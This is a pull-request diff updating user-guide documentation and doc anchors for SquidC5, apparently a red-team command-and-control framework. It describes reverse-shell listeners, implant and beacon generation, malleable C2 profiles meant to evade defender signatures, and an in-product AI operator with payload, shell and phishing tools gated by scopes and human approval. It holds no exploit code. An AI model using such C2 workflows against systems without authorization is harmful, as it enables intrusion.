+4. For teamserver PEMs, use [TLS certificate library](#tls-certificate-library).
 
 ### Example
 
 ```text
 server_name: cdn.lab.example
 uris: /jquery.js,/api/sync
-→ generate nginx location blocks pointing at team server
+→ nginx location blocks pointing at team server
 ```
+
+### See also
+
+- [C2 profiles (Profiles)](#c2-profiles-profiles)
+- [Deployment — TLS](deployment.md#tls-https-default-on-new-instances)
+- [Runbook — Malleable HTTP profiles](operator-runbook.md#malleable-http-profiles)
+
+---
+
+## TLS certificate library
+
+### What
+
+Admin library of PEM certificate/key pairs. Activate a pair for the instance TLS material (ops UI + API). Activation copies PEMs into instance TLS paths; **restart the process** (`systemctl restart squidc5`) to serve the new material.
+
+**UI:** Ops → **Admin** → TLS certificates (admin scope).
+
+### Why
+
+Rotate or replace self-signed defaults with CA-issued certs without rebuilding the binary; keep PEMs out of git.
+
+### How
+
+1. Upload cert + key PEMs (admin).
+2. **Activate** the desired pair.
+3. Restart SquidC5 so uvicorn loads new files.
+4. Verify: `curl -sk https://HOST:8443/api/v1/health` (or full verify with real CA).
+
+Env overrides still work: `SQUIDC5_TLS_CERT_FILE` / `SQUIDC5_TLS_KEY_FILE`.
+
+### Example
+
+```text
+Admin → TLS → Upload → Activate → systemctl restart squidc5
+```
+
+### Pitfalls
+
+| Mistake | Result |
+|---------|--------|
+| Activate without restart | Old cert still served |
+| Mismatched cert/key | TLS handshake failures |
+| Commit PEMs to git | Secret leak — never do this |
+
+### See also
+
+- [Deployment — TLS](deployment.md#tls-https-default-on-new-instances)
+- [Security model](#security-model)
 
 ---
 
@@ -536,7 +895,7 @@ uris: /jquery.js,/api/sync
 
 ### What
 
-Metrics counters and append-only **audit** log of operator/API actions.
+Metrics counters and append-only **audit** log of operator/API/AI actions. **Observe** nav page + CLI.
 
 ### Why
 
@@ -547,10 +906,53 @@ After-action review, dispute resolution, and detection of misuse of the C2 itsel
 ```bash
 sc5 metrics
 sc5 audit --limit 50
-sc5 events   # SSE stream if available
+sc5 audit-verify --limit 500
+sc5 events
 ```
 
-UI: **Metrics** / **Audit log** buttons dump JSON into the panel outbox.
+UI: **Observe** → Metrics / Audit / timeline controls.
+
+### Example
+
+```text
+Ops → Observe → Audit log → filter mine
+```
+
+### See also
+
+- [Timeline and reports](#timeline-and-reports)
+- [Threat model](threat-model.md)
+
+---
+
+## Timeline and reports
+
+### What
+
+Anomaly hints, chronological timeline, exportable engagement report.
+
+### Why
+
+Handoff and after-action need more than raw audit lines.
+
+### How
+
+Ops **Observe** panel buttons call observability endpoints (metrics/audit scoped). CLI:
+
+```bash
+sc5 report --raw > engagement-report.md
+```
+
+### Example
+
+```text
+Ops → Observe → Export report
+```
+
+### See also
+
+- [Observability](#observability)
+- [Runbook — Report export](operator-runbook.md#report-export)
 
 ---
 
@@ -560,25 +962,30 @@ UI: **Metrics** / **Audit log** buttons dump JSON into the panel outbox.
 
 **INKO** is SquidC5's **Intelligent Neural Kinetic Operator**: the in-ops neural operator for chat-driven inspection and railed actions on the teamserver.
 
-- **UI:** top-bar **INKO** opens a right-side flyout (~440px desktop; full width on mobile). Backdrop or **Escape** closes it.
-- **Chat:** multi-turn Q&A; Enter to send, Shift+Enter for newline; pending “Thinking…” while waiting.
-- **History:** kept in this browser (`localStorage`); Clear wipes the thread.
-- **Page:** Ops nav **INKO** is the full workspace (LLM picker, status, tools list, page chat).
-- **Markdown:** assistant replies render safely (escaped HTML; fenced code, links https-only).
-- **Server:** sandboxed Admin AI stack underneath — allow-listed chat tools, `sanitize_untrusted`, policy/scopes/HITL per tool, full audit.
+| Surface | Behavior |
+|---------|----------|
+| Top-bar **◈ INKO** | Right flyout (~440px desktop; full width mobile). Backdrop / Escape closes |
+| Nav **INKO** | Full workspace: connection + **model** selects, status, tools, page chat |
+| Chat | Multi-turn; Enter send, Shift+Enter newline; “Thinking…” while pending |
+| History | Browser `localStorage`; New chat / Clear wipes thread |
+| Markdown | Safe render (escaped HTML; fenced code; https links; ordered/unordered lists; tables) |
+| Server | Sandboxed Admin AI — allow-listed tools, `sanitize_untrusted`, policy/HITL, audit |
 
-Structured Admin AI capabilities (`recon_assist`, `shell_classify`, …) remain available via API/CLI for deterministic jobs. **INKO chat** is the operator-facing surface.
+Structured Admin AI capabilities (`recon_assist`, `shell_classify`, …) remain via API/CLI. **INKO chat** is the primary operator surface.
+
+On each chat turn the server system prompt includes C5 purpose, object model, workflows, and tool playbook so INKO answers in-product.
 
 ### Why
 
-Red team ops need AI that lives *inside* the C5 with the same scopes and audit as humans—not a browser tab that never saw your HITL policy.
+Red team ops need AI that lives *inside* the C5 with the same scopes and audit as humans — not a browser tab that never saw your HITL policy.
 
 ### How
 
-1. Configure a BYO LLM under **Admin** → Configure LLM (or `sc5 llm add`). Optional — offline intents still handle phrases like “list sessions” / “setup reverse shell on 4444”.
-2. Click **INKO** in the top bar (needs `ai:use` or `admin`).
-3. Pick an LLM connection, ask INKO to inspect or act.
-4. Approve HITL when policy requires it. Review audit for `ai.chat.tool.*` / `ai.admin.chat`.
+1. Configure a BYO LLM under **Admin** → [LLM connections](#llm-connections) (or `sc5 llm add`). Optional — offline intents still handle phrases like “list sessions”.
+2. Open **◈ INKO** (needs `ai:use` or `admin`).
+3. Pick **connection** and **model** (models load from provider; switching can PATCH the connection default).
+4. Ask INKO to inspect or act. Approve HITL when required.
+5. Review audit for `ai.chat.tool.*` / `ai.admin.chat`.
 
 ### Chat API
 
@@ -591,26 +998,32 @@ Content-Type: application/json
   "message": "Setup a reverse shell listener on 4444 and start it",
   "history": [{"role": "user", "content": "…"}, {"role": "assistant", "content": "…"}],
   "llm_id": optional,
+  "model": optional,
   "max_rounds": 6
 }
 ```
 
-Response includes `reply`, `mode` (`llm`|`offline`), and `tool_trace` (which railed tools ran).
+Response: `reply`, `mode` (`llm`|`offline`), `tool_trace`.
 
 Tool catalog (no secrets): `GET /api/v1/ai/tools`.
 
-Railed tools include (scopes + policy enforced): `list_sessions`, `get_session`, `list_listeners`, `create_listener`, `start_listener`, `stop_listener`, `list_tasks`, `create_task`, `generate_payload`, `get_metrics`, `list_recent_events`, `list_audit`, `interact_shell` (HITL when required), and related helpers.
+Railed tools include (scopes + policy): `list_sessions`, `get_session`, `list_listeners`, `create_listener`, `start_listener`, `stop_listener`, `list_tasks`, `create_task`, `generate_payload`, `list_payload_templates`, `register_payload_template`, `save_asset`, `list_assets`, `list_profiles`, `activate_profile`, `upsert_profile`, `get_metrics`, `list_recent_events`, `list_audit`, `get_platform_status`, `interact_shell` (HITL when required).
 
-### Example (CLI capabilities)
+### Example
 
 ```bash
 sc5 ai recon_assist --data "windows domain, no creds yet"
 sc5 ai shell_classify --data "session looks like scanner"
+sc5 llm list
+```
+
+```text
+Ops → ◈ INKO → connection grok-prod → model grok-4.5 → "list sessions"
 ```
 
 ### Admin AI (structured capabilities)
 
-Server name for the sandboxed **capability runner** behind INKO (`POST /api/v1/ai/run`). Fixed functions with structured inputs — not an open agent loop.
+Capability runner behind INKO (`POST /api/v1/ai/run`). Fixed functions — not an open agent loop.
 
 | Capability | Intent |
 |------------|--------|
@@ -619,9 +1032,23 @@ Server name for the sandboxed **capability runner** behind INKO (`POST /api/v1/a
 | `payload_template` | Template guidance |
 | `phishing_asset` | Authorized phishing content assist |
 | `doc_generate` | Engagement documentation drafts |
-| `session_triage` / `task_suggest` / `opsec_review` / … | See full allow-list in product |
+| `session_triage` / `task_suggest` / `opsec_review` / … | Full allow-list in product |
 
-**Phishing-related capabilities** exist only for **authorized** engagements (phishing simulations under ROE).
+Phishing-related capabilities exist only for **authorized** engagements under ROE.
+
+### Pitfalls
+
+| Mistake | Result |
+|---------|--------|
+| No LLM configured | Offline intents only |
+| Missing `ai:use` | Chat 403 |
+| Expecting open agent | Tools are allow-listed and round-bounded |
+
+### See also
+
+- [LLM connections](#llm-connections)
+- [Runbook — INKO](operator-runbook.md#inko-intelligent-neural-kinetic-operator)
+- [Vision — Dual AI](squidc5-vision.md#dual-ai-architecture)
 
 ---
 
@@ -629,15 +1056,15 @@ Server name for the sandboxed **capability runner** behind INKO (`POST /api/v1/a
 
 ### What
 
-BYO OpenAI-compatible endpoints (including xAI Grok) stored **server-side** in `data/`.
+BYO OpenAI-compatible endpoints (xAI Grok, OpenAI, Groq, OpenRouter, Ollama, …) stored **server-side** in `data/`. Keys encrypted at rest; **never** returned by status APIs.
 
 ### Why
 
-INKO / Admin AI need a model; keys must never return in status APIs or git.
+INKO needs a model; keys must never land in git or browser responses.
 
 ### How
 
-**Ops UI:** **Admin** → Configure LLM (provider presets: xAI, OpenAI, Groq, OpenRouter, Ollama, …). Paste API key → **Refresh models** (server proxies `/models`, SSRF-guarded). Keys encrypted at rest; never returned by API.
+**Ops UI:** **Admin** → Configure LLM → provider preset → paste key → **Refresh models** (server proxies `/models`, SSRF-guarded). INKO model switcher can PATCH default model without re-entering the key.
 
 **CLI:**
 
@@ -646,8 +1073,24 @@ sc5 llm add grok-prod grok-3 --provider xai --base-url https://api.x.ai/v1 --api
 sc5 llm list
 ```
 
-Status: `GET /api/v1/ai/status` shows provider/model presence, **not** the key.  
-Models probe: `POST /api/v1/llm/models` (admin / `llm:manage` only).
+| API | Notes |
+|-----|--------|
+| `GET/POST /api/v1/llm` | List / add connections |
+| `PATCH /api/v1/llm/{id}` | Switch default model (preserves key) |
+| `POST /api/v1/llm/models` | Probe models (`llm_id` for `ai:use`; raw URL needs manage scope) |
+| `GET /api/v1/ai/status` | Presence only — **no keys** |
+
+### Example
+
+```text
+Admin → LLM → xAI → Refresh models → Save
+INKO flyout → connection + model selects
+```
+
+### See also
+
+- [INKO](#inko-intelligent-neural-kinetic-operator)
+- [Security model](#security-model)
 
 ---
 
@@ -675,37 +1118,11 @@ sc5 tokens list
 sc5 tokens revoke <id>
 ```
 
----
+### See also
 
-## Timeline and reports
-
-### What
-
-Anomaly hints, chronological timeline, exportable engagement report.
-
-### Why
-
-Handoff and after-action need more than raw audit lines.
-
-### How
-
-Ops panel buttons call observability endpoints (metrics/audit scoped). Export for offline notes — still authorized-use only.
-
----
-
-## Ops console layout
-
-The `/ops` console is an **app shell** (like Mythic / Havoc-style UIs):
-
-| Region | Purpose |
-|--------|---------|
-| **Top bar** | Host, online status, Connect |
-| **Left nav** | Dashboard, Sessions, Listeners, Payloads, Post-Ex, Collab, Observe, Admin |
-| **Main** | Active workspace for the selected nav item |
-| **Right rail** | Selected session context (claim, shell, task) |
-| **Bottom** | Live event stream + command output |
-
-Discoverability: pick **Sessions** → click a row → use the right rail. Admin tools live under **Admin** (admin scope only).
+- [Identity](#identity)
+- [MCP tools](#mcp-tools)
+- [Runbook — Tokens](operator-runbook.md#tokens)
 
 ---
 
@@ -715,6 +1132,8 @@ Discoverability: pick **Sessions** → click a row → use the right rail. Admin
 
 Teams, **session claim/lock**, handoff packs, spectator snapshots, operator presence, team-scoped chat, and per-operator audit filters.
 
+**UI:** Ops → **Collab**.
+
 ### Why
 
 Two operators must not stomp the same shell; shift changes need context; leads need read-only watch.
@@ -723,61 +1142,27 @@ Two operators must not stomp the same shell; shift changes need context; leads n
 
 | Action | API / UI |
 |--------|----------|
-| Claim session | `POST /api/v1/sessions/{id}/claim` · Workbench → Claim |
+| Claim session | `POST /api/v1/sessions/{id}/claim` · Context → Claim |
 | Release | `POST /api/v1/sessions/{id}/release` |
-| Handoff pack | `POST /api/v1/sessions/{id}/handoff` `{to, note}` · Teams panel |
-| Spectate | `GET /api/v1/sessions/{id}/spectator` (needs `sessions:read`, not shell write) |
+| Handoff pack | `POST /api/v1/sessions/{id}/handoff` `{to, note}` |
+| Spectate | `GET /api/v1/sessions/{id}/spectator` |
 | Presence | `POST/GET /api/v1/collab/presence` |
 | Team chat | `POST /api/v1/collab/chat` with optional `team_id` |
 | My audit | `GET /api/v1/audit/me` or `?mine=true` |
 
 Claim lock is enforced on shell, tasks, and file ops (admins bypass). Feature flag: `collab_teams`.
 
-### Ops UI workbench
-
-Session workbench drives Shell / Tasks / Files / SOCKS / Modules. Live events rail polls metrics. Layout presets: Operator / Lead / Admin.
-
----
-
-## C2 profiles
-
-### What
-
-**Malleable C2 profiles** define the *shape* of implant traffic—especially HTTP(S): URI paths, headers, body wrapping, jitter, and decoy-friendly patterns. The *active* profile is the contract between **generators** and the **server parser**.
-
-Industry context: commercial C2 frameworks popularized “malleable profiles” so operators can mimic CDNs, APIs, or static sites instead of a fixed default URI.
-
-**Learn more:** [Grokpedia: command-and-control](https://grok.com/pedia/command-and-control) · [beacon](https://grok.com/pedia/beacon)
-
-### Why
-
-Default C2 fingerprints are easy for defenders to signature. Profiles:
-
-- Change URI/header surface  
-- Support jitter so check-ins are not metronomic  
-- Align redirector configs (see [Redirector and certificates](#redirector-and-certificates))  
-
-### How
-
-1. List profiles → **activate** one.
-2. **Generate beacon (active)** so implants match that profile.
-3. After switching profiles, **regenerate** implants — old beacons may miss the new surface.
-4. If you front with nginx/CDN, update redirector URIs to match the profile.
-
 ### Example
 
-```text
-Ops → C2 profiles → activate "jquery-cdn" → Generate beacon (active)
-# payload uses profile paths/headers; server expects the same
+```bash
+sc5 teams create red-cell
+# claim via Ops context rail or REST
 ```
 
-### Operator pitfalls
+### See also
 
-| Mistake | Result |
-|---------|--------|
-| Activate profile B, keep beacons built for A | Check-ins fail or never task |
-| Redirector paths ≠ profile paths | 404 / silent drop at edge |
-| Change profile mid-op without regen | Split fleet behavior |
+- [Runbook — Teams and collab](operator-runbook.md#teams-and-collab)
+- [Identity](#identity)
 
 ---
 
@@ -785,20 +1170,31 @@ Ops → C2 profiles → activate "jquery-cdn" → Generate beacon (active)
 
 ### What
 
-Runtime kill-switches enforced by the server (MCP, AI paths, etc.).
+Runtime kill-switches enforced by the server (MCP, AI paths, listener kinds, etc.).
 
 ### Why
 
-Incident response: disable a capability without redeploying. Defaults stay secure; `public_docs` cannot be enabled.
+Incident response: disable a capability without redeploying. Defaults stay secure; `public_docs` **cannot** be enabled.
 
 ### How
 
 ```bash
-# API (admin)
 curl -sk -H "Authorization: Bearer $TOK" https://HOST:8443/api/v1/features
+# PUT with admin to flip allowed flags
 ```
 
-UI: flip toggles → **Save features**.
+UI: **Admin** → features → **Save**.
+
+### Example
+
+```text
+Admin → Features → smtp_oast on → Save (for SMTP OAST lab)
+```
+
+### See also
+
+- [Security model](#security-model)
+- [MCP tools](#mcp-tools)
 
 ---
 
@@ -806,7 +1202,7 @@ UI: flip toggles → **Save features**.
 
 ### What
 
-Risk / allow-deny engine: thresholds, HITL gates, chain limits.
+Risk / allow-deny engine: thresholds, HITL gates, chain limits for humans, MCP, and Admin AI.
 
 ### Why
 
@@ -823,7 +1219,13 @@ High-risk actions can require human approval or be denied outright — rails for
 ```bash
 sc5 policy get
 sc5 policy set --file rules.json
+sc5 policy hitl list
 ```
+
+### See also
+
+- [INKO](#inko-intelligent-neural-kinetic-operator)
+- [MCP tools](#mcp-tools)
 
 ---
 
@@ -833,28 +1235,27 @@ sc5 policy set --file rules.json
 
 Bridge for **external** AI/tools using an allow-listed tool-call pattern (Model Context Protocol style). External models invoke *named tools* with JSON arguments; SquidC5 executes only tools on that token’s allow-list.
 
-**Learn more:** [Grokpedia: model-context-protocol](https://grok.com/pedia/model-context-protocol)
-
 ### Why
 
-External models must not get open-ended shell on the C2. Design goals:
+External models must not get open-ended shell on the C2:
 
-- **Least privilege** — `mcp:connect` + explicit `mcp_tools`  
-- **Determinism** — prefer single-step tools over autonomous multi-hop agents  
-- **Audit** — each call is logged  
-- **Default off** — feature flag until an engagement needs it  
+- **Least privilege** — `mcp:connect` + explicit `mcp_tools`
+- **Determinism** — prefer single-step tools over autonomous multi-hop agents
+- **Audit** — each call is logged
+- **Default off** — feature flag until an engagement needs it
 
 ### How
 
-1. Enable MCP via features/settings when approved.
-2. Mint a token with `mcp:connect` and a tight `mcp_tools` list (e.g. `list_sessions`, `create_task`).
+1. Enable MCP via features when approved.
+2. Mint a token with `mcp:connect` and a tight `mcp_tools` list.
 3. **List tools** / **Call** with JSON args from Ops or CLI.
 
 ### Example
 
 ```bash
-sc5 tokens create ext-ai --scopes "mcp:connect,sessions:read,tasks:read,tasks:write,metrics:read"
-# ensure mcp_tools allow-list set via API/UI as supported
+sc5 tokens create ext-ai \
+  --scopes "mcp:connect,sessions:read,tasks:read,tasks:write,metrics:read" \
+  --mcp-tools "list_sessions,get_session,list_tasks,create_task,get_metrics"
 sc5 mcp tools
 sc5 mcp call list_sessions --args-json '{}'
 ```
@@ -864,16 +1265,22 @@ sc5 mcp call list_sessions --args-json '{}'
 | | INKO / Admin AI | MCP |
 |--|----------------|-----|
 | Who | Operators on the team server | External models / agents |
-| Gate | `ai:use` + capability allow-list | `mcp:connect` + per-tool allow-list |
+| Gate | `ai:use` + capability / chat-tool allow-list | `mcp:connect` + per-tool allow-list |
 | Default | Offline fallback if no LLM | Often feature-off |
+
+### See also
+
+- [INKO](#inko-intelligent-neural-kinetic-operator)
+- [Tokens](#tokens)
+- [Vision — Dual AI](squidc5-vision.md#dual-ai-architecture)
 
 ---
 
-## Verified reverse shells (overview card)
+## Verified reverse shells
 
 ### What
 
-Live TCP reverse shells that passed classification + exec probe.
+Live TCP reverse shells that passed classification + exec probe (`verified: true`).
 
 ### Why
 
@@ -881,7 +1288,19 @@ Prefer these for Shell commands. Dead/echo-only connections are reaped.
 
 ### How
 
-See [Shell](#shell) and [Listeners](#listeners).
+See [Shell](#shell) and [Listeners](#listeners). Dashboard and Sessions highlight verified shells.
+
+### Example
+
+```bash
+sc5 sessions list --shells
+# look for verified: true
+```
+
+### See also
+
+- [Shell](#shell)
+- [Event stream](#event-stream)
 
 ---
 
@@ -893,68 +1312,155 @@ Quick metric chips from the last poll (stabilized, false positives, AI calls, et
 
 ### Why
 
-Confirm the API is healthy and counters are moving without opening Observability.
+Confirm the API is healthy and counters are moving without opening full Observability.
+
+### How
+
+Visible on Dashboard / top status after connect. Soft refresh updates chips without wiping focused form fields.
+
+### Example
+
+```text
+Dashboard → Signal chips tick after shell.verified / ai.admin.chat
+```
+
+### See also
+
+- [Status overview](#status-overview)
+- [Observability](#observability)
 
 ---
 
 ## CLI reference
 
-Primary entry points after install:
+### What
+
+Primary entry points after `pip install -e .` or binary install: `sc5` / `squidc5-cli`.
+
+### Why
+
+Scriptable ops and headless operator workflows; same scopes as Ops UI.
+
+### How
 
 ```bash
-sc5 login --url <base> --token <sc5_...>
-sc5 health | whoami | metrics | audit | events | repl
+sc5 login --url <base> --token <sc5_...> [--insecure]
+sc5 health | whoami | metrics | audit [--limit N] | events | repl
 sc5 sessions list|get|close|reap
 sc5 tasks list|get|create
 sc5 listeners list|create|start|stop|delete
 sc5 payloads templates|generate
-sc5 shell <session_id> "<cmd>"
+sc5 profiles list|activate
+sc5 implants families|build|generate
+sc5 oast token create | tokens list | hits
+sc5 shell <session_id> "<cmd>" | sc5 shell all "<cmd>"
 sc5 tokens list|create|revoke
-sc5 ai <capability> [--data "..."]
+sc5 ai <capability> [--data "..."] [--llm <id>]
 sc5 llm list|add
 sc5 mcp tools|call
-sc5 policy get|set
+sc5 policy get|set | hitl list|approve|deny
+sc5 backup | restore
+sc5 audit-verify
+sc5 report
 ```
 
 Config: `~/.config/squidc5/config.json` (never commit).  
-Env: `SQUIDC5_URL`, `SQUIDC5_TOKEN`.
+Env: `SQUIDC5_URL`, `SQUIDC5_TOKEN` (and `SC5_*` aliases).
 
-Full surface also documented in [AGENTS.md](../AGENTS.md) (developer/agent memory).
+### Example
+
+```bash
+sc5 login --url https://HOST:8443 --token sc5_... --insecure
+sc5 sessions list
+sc5 audit-verify --limit 200
+```
+
+### See also
+
+- **Full CLI surface:** [AGENTS.md](../AGENTS.md)
+- [Operator runbook](operator-runbook.md)
 
 ---
 
 ## Deployment
 
-### Lab (Docker)
+### What
+
+How to run SquidC5 in lab (Docker) vs production (CI binary only).
+
+### Why
+
+Prod must not run WIP trees or untested feature-branch binaries.
+
+### How
+
+**Lab (Docker):**
 
 ```bash
 docker compose up --build -d
 docker exec squidc5 cat /data/admin_token.txt
 ```
 
-### Production (binary only)
+**Production (binary only):**
 
 1. PR → CI green → merge `master`
-2. CI builds `squidc5-linux-x64` + release
+2. CI builds `squidc5-linux-x64` + GitHub Release
 3. Deploy **that binary only**; keep `data/` intact
 
-See [deployment.md](deployment.md). **Do not** rsync WIP source to prod.
+### Example
+
+See full steps in [deployment.md](deployment.md).
+
+### See also
+
+- [Deployment](deployment.md)
+- [Prod readiness](prod-readiness-plan.md)
 
 ---
 
 ## Troubleshooting
 
+### What
+
+Common failure modes and first checks.
+
+### Why
+
+C2 ops failures are often listener, network, or scope issues — not “the UI is broken.”
+
+### How
+
 | Symptom | Checks |
 |---------|--------|
 | Reverse shell never appears | Listener `running`? Firewall? Port publish (Docker bridge)? Privileged port sysctl? |
-| Shell listed but mute | Exec probe failed → reaped; check false-shell filter / stage-2 |
-| Admin panels missing | Token scopes? Hard-refresh? `console.js` 403? |
+| Shell listed but mute | Exec probe failed → reaped; false-shell filter / stage-2 |
+| Admin panels missing | Token scopes? Hard-refresh? Admin JS 403? |
 | CORS errors | Open `/ops` on the C2 host, not `file://` or wrong origin |
-| Beacon no tasks | Wrong session id? Profile mismatch? Listener kind `http`? |
-| AI offline only | No LLM configured under LLM connections |
+| Beacon no tasks | Wrong session id? [Profile mismatch](#c2-profiles-profiles)? Listener kind `http`? |
+| AI offline only | No LLM under [LLM connections](#llm-connections) |
+| OAST DNS silent | Zone NS / [OAST deploy](deployment.md#oast-collaborator-dns-http-smtp) |
+| TLS still old after activate | Restart process after [TLS library](#tls-certificate-library) activate |
+
+### Example
+
+```bash
+sc5 listeners list
+sc5 sessions list --shells --include-dead
+sc5 health
+```
+
+### See also
+
+- [Runbook — If reverse shell fails](operator-runbook.md#if-reverse-shell-fails)
+- [Deployment](deployment.md)
 
 ---
 
 ## Authorized use reminder
 
-SquidC5 is for **legitimate, authorized** security testing only. Unauthorized access to computer systems is illegal. Operators are responsible for engagement scope, rules of engagement, and data handling.
+SquidC5 is for **authorized** security testing and education only. Unauthorized access to computer systems is illegal. Operators are responsible for obtaining proper authorization and staying within ROE.
+
+### See also
+
+- [SECURITY.md](../SECURITY.md)
+- [Threat model](threat-model.md)

--- a/web/ops-admin.js
+++ b/web/ops-admin.js
@@ -42,6 +42,7 @@
   const PAGE_DOCS = {
     dashboard: [
       { a: "status-overview", t: "Status overview" },
+      { a: "ops-console-layout", t: "Ops layout" },
       { a: "connection", t: "Connection" },
       { a: "sessions", t: "Sessions" },
     ],
@@ -49,45 +50,52 @@
       { a: "sessions", t: "Sessions" },
       { a: "shell", t: "Shell interact" },
       { a: "tasks", t: "Tasks / beacons" },
+      { a: "verified-reverse-shells", t: "Verified shells" },
     ],
     listeners: [
       { a: "listeners", t: "Listeners" },
+      { a: "oast-collaborator", t: "OAST" },
       { a: "payloads-and-implants", t: "Payloads" },
     ],
     payloads: [
       { a: "payloads-and-implants", t: "Payloads & implants" },
-      { a: "c2-profiles", t: "C2 profiles" },
+      { a: "c2-profiles-profiles", t: "C2 profiles" },
+      { a: "artifacts", t: "Artifacts" },
     ],
     profiles: [
-      { a: "c2-profiles", t: "C2 profiles" },
+      { a: "c2-profiles-profiles", t: "C2 profiles" },
+      { a: "payloads-and-implants", t: "Payloads" },
+      { a: "redirector-and-certificates", t: "Redirector" },
     ],
     artifacts: [
-      { a: "payloads-and-implants", t: "Saved artifacts" },
+      { a: "artifacts", t: "Artifacts" },
+      { a: "payloads-and-implants", t: "Payloads & implants" },
     ],
     postex: [
-      { a: "file-ops", t: "File ops" },
-      { a: "socks-pivot", t: "SOCKS pivot" },
-      { a: "modules", t: "Inject / BOF" },
+      { a: "post-ex", t: "Post-Ex" },
+      { a: "sessions", t: "Sessions" },
     ],
     collab: [
       { a: "multi-operator-collab", t: "Multi-op collab" },
-      { a: "operator-chat", t: "Operator chat" },
-      { a: "hitl", t: "HITL queue" },
+      { a: "policy", t: "Policy / HITL" },
+      { a: "identity", t: "Identity" },
     ],
     ai: [
       { a: "inko-intelligent-neural-kinetic-operator", t: "INKO" },
-      { a: "admin-ai", t: "Admin AI (legacy anchor)" },
       { a: "llm-connections", t: "LLM connections" },
+      { a: "mcp-tools", t: "MCP tools" },
     ],
     observe: [
+      { a: "observability", t: "Observability" },
       { a: "timeline-and-reports", t: "Timeline & reports" },
-      { a: "audit-me", t: "Audit" },
+      { a: "event-stream", t: "Event stream" },
     ],
     admin: [
       { a: "tokens", t: "Tokens" },
+      { a: "llm-connections", t: "LLM connections" },
+      { a: "tls-certificate-library", t: "TLS certificates" },
       { a: "feature-toggles", t: "Feature toggles" },
       { a: "policy", t: "Policy" },
-      { a: "llm-connections", t: "LLM connections" },
       { a: "mcp-tools", t: "MCP tools" },
     ],
   };


### PR DESCRIPTION
## Summary
Full documentation overhaul for consistency and current product coverage.

### Structure (Diátaxis)
- **Reference:** user-guide What / Why / How / Example / Pitfalls / See also
- **How-to:** operator-runbook Goal / Prerequisites / Steps / Verify / If fails
- **Deploy:** Context / Configuration / Commands / Verify
- **Explanation:** vision, threat model
- **Index:** docs/README with Ops nav → section map

### Product parity
- Profiles, Artifacts, Post-Ex, OAST, TLS certificate library, INKO model switcher
- Ops `PAGE_DOCS` anchors updated to match new headings
- All internal markdown links verified (0 broken)

### Also
- Root README features + docs table
- AGENTS / CLAUDE / CONTRIBUTING / SECURITY cross-links
- OAST lab IPs generalized to RFC5737 examples in deployment

## Test plan
- [x] Link checker script (file + anchor)
- [x] node --check ops-admin.js
- [ ] Spot-check Ops Docs menus after deploy
- [ ] Open a few user-guide anchors from docs/README Ops map